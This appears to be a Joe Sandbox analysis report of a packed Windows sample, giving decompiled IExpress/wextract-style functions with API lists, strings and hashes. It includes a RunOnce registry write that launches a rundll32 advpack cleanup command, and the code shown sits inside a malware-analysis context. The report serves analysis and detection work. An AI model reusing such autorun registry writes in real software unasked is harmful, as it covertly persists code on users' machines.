                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E00E744B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0xe788c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0xe787a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0xe78598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E00E74200;
                                                                                                                                                                                                      					_v28 = 0xe788c0;
                                                                                                                                                                                                      					 *0xe7a288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0xe7a288(_t32, 0xe788c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0xe788c0 != 0) {
                                                                                                                                                                                                      							E00E71680(0xe787a0, 0x104, 0xe788c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe7a288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0xe787a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0xe788c0);
                                                                                                                                                                                                      					_t61 = 0xe788c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0xe788c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0xe788c0; // 0x1cf1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0xe788c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xe788c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74295
                                                                                                                                                                                                      0x00e7429f
                                                                                                                                                                                                      0x00e742a5
                                                                                                                                                                                                      0x00e742aa
                                                                                                                                                                                                      0x00e742aa
                                                                                                                                                                                                      0x00e742ad
                                                                                                                                                                                                      0x00e742ad
                                                                                                                                                                                                      0x00e742af
                                                                                                                                                                                                      0x00e742b0
                                                                                                                                                                                                      0x00e742b6
                                                                                                                                                                                                      0x00e742c2
                                                                                                                                                                                                      0x00e742c8
                                                                                                                                                                                                      0x00e742ce
                                                                                                                                                                                                      0x00e742e4
                                                                                                                                                                                                      0x00e742e4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e742ce

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00E74236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00E7424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00E74263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00E7427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00E788C0,?,00000001), ref: 00E7429F
                                                                                                                                                                                                      • CharPrevA.USER32(00E788C0,01CF1181,?,00000001), ref: 00E742C2
                                                                                                                                                                                                      • CharPrevA.USER32(00E788C0,00000000,?,00000001), ref: 00E742D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E74391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E743A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: b1e44e7ba60ccfe8e01c0a04c69cf42a0a393c91b4eb8f84587941676f7d2f0e
                                                                                                                                                                                                      • Instruction ID: 8593a1b6fa482520b467683007825b85868b64dbbafebdb1d1896391b1ba85c7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e44e7ba60ccfe8e01c0a04c69cf42a0a393c91b4eb8f84587941676f7d2f0e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 474128B4A40340AFE711DF75DC8C96E7BB4EB94348F4894A9E90DB3291CB748C45C762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E72773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E00E71781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E00E7658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E00E7658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0xe71140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E00E71680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperA.USER32(D47724E2,00000000,00000000,00000000), ref: 00E727A8
                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 00E727B5
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00E727BC
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72829
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72852
                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72870
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E728A0
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00E728AA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E728B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00E727E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                      • Opcode ID: 3c37f5a89692bb9759b2e9af88fec26a6c3f9be1bc7cacff6c052758ad024d40
                                                                                                                                                                                                      • Instruction ID: 2062c439050c5090dc96841053a8d2f66e93bc6473246a183217cf073b0795c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c37f5a89692bb9759b2e9af88fec26a6c3f9be1bc7cacff6c052758ad024d40
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8941B470A00128AFEB289B65DC45AEE77BDEB55704F0484A9F64DF2100CB714EC59FA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                      			E00E72267() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t19 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                      				if( *0xe78530 != 0) {
                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      								E00E7658A( &_v268, 0x104, 0xe71140);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      							E00E7171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00E722A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00E722D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E722F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E72305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00E7236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E7237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00E72299
                                                                                                                                                                                                      • wextract_cleanup0, xrefs: 00E7227C, 00E722CD, 00E72363
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00E7232D
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E72321
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                      • API String ID: 3027380567-2874043782
                                                                                                                                                                                                      • Opcode ID: 85b7923ef53e63275c98f3642ee0e00dd54fbff612b57c7f42d5d466cbb40d0a
                                                                                                                                                                                                      • Instruction ID: ed1c0b0fecbda0cd6c911d0af26827525c0f19c423af2f00352511d942163f24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85b7923ef53e63275c98f3642ee0e00dd54fbff612b57c7f42d5d466cbb40d0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131C571A002186BDB21DB61DC49FEE7B7CEF64704F0441E9B54DB6051EA70AF88CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E00E73100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0xe78590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0xe78590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E00E743D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xe78d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0xe788b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E00E730C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x00e731ad
                                                                                                                                                                                                      0x00e73120
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7312a
                                                                                                                                                                                                      0x00e73134
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73134
                                                                                                                                                                                                      0x00e7312c
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00E7313B
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E7314B
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 00E7316A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E73176
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00E7317D
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 00E73185
                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 00E73190
                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00E730C0), ref: 00E731A3
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00E731CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 3785188418-3940384054
                                                                                                                                                                                                      • Opcode ID: 6d748932ca2a1aa59a6513c2c039a54f26d50a4ca597eb1920da3936d8f2976b
                                                                                                                                                                                                      • Instruction ID: 2918507c4821d289fc578005f4babb286002a608dedf4a96f166dcc8f9237a32
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d748932ca2a1aa59a6513c2c039a54f26d50a4ca597eb1920da3936d8f2976b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E811D231246251BFEB50DF35EC0CB9E3B64EB86725F949220F85DB11E0DB708685E742
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E00E718A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0xe78128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					return E00E76CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00E717EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0xe78128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
